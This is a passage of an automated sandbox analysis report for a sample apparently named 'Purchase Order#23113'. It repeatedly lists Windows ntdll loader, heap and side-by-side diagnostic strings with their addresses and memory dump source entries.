                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789A01
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                                                                            • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01789A2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                                                                            • SXS: %s() passed the empty activation context, xrefs: 017A2165
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                                                                            • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                                                                            • LdrpInitializeProcess, xrefs: 0176C6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                                                                            • @, xrefs: 01768591
                                                                            • LdrpInitializeProcess, xrefs: 01768422
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                                                                            • .Local, xrefs: 017628D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                                                                            • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • apphelp.dll, xrefs: 01752462
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                                                                            • LdrpDynamicShimModule, xrefs: 0179A998
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • HEAP: , xrefs: 01743264
                                                                            • HEAP[%wZ]: , xrefs: 01743255
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: $@
                                                                            • API String ID: 2994545307-1077428164
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                                                                            • LdrpCheckModule, xrefs: 0179A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                                                                            • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • PreferredUILanguages, xrefs: 017EC212
                                                                            • @, xrefs: 017EC1F1
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                                                                            • LdrpCheckRedirection, xrefs: 017B488F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                                                                            • LdrpInitializationFailure, xrefs: 017B20FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrResSearchResource Enter, xrefs: 0173AA13
                                                                            • LdrResSearchResource Exit, xrefs: 0173AA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            • API String ID: 0-17815947
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                                                                            • kLsE, xrefs: 01730540
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 0-2547482624
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            • API String ID: 0-2876891731
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            • API String ID: 2994545307-4008356553
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            • API String ID: 0-1339004836
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalTags
                                                                            • API String ID: 0-1106856819
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .mui
                                                                            • API String ID: 0-1199573805
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EXT-
                                                                            • API String ID: 0-1948896318
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                            • API String ID: 0-702105204
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
